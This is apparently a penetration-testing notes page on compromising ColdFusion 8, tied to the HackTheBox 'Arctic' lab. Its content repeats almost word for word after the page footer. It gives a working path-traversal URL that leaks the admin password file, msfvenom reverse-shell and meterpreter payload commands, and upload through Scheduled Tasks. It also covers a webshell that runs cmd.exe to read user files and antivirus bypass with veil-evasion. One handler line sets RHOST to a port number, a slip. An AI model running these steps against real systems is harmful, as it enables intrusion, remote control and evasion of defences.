Coldfusion

Basics

REF: Arctic-HTB

Local File Inclusion - Password Leak!

Coldfusion 8 CVE
Get the Password hash using LFI

http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Reverse Shell

If you get Admin into Coldfusion
You can upload a java reverse shell

Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!

Webshell

If you get Admin into Coldfusion
You could upload "cfexec.cfm"
/usr/share/webshells/cfm/cfexec.cfm ..kali

vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit

Reverse Executable

You may be able to upload a reverse executable

----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set RHOST 4444
RUN

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!

Other:

Also consider:

PreviousBlogs NextContent Management (CMS)

Last updated 2 years ago

Was this helpful?

Reverse Shell

If you get Admin into Coldfusion

You can upload a java reverse shell

Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!

Webshell

If you get Admin into Coldfusion

You could upload "cfexec.cfm"

--bad link

/usr/share/webshells/cfm/cfexec.cfm ..kali

vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit

Reverse Executable

You may be able to upload a reverse executable

Avoid AV detection with

----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set RHOST 4444
RUN

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!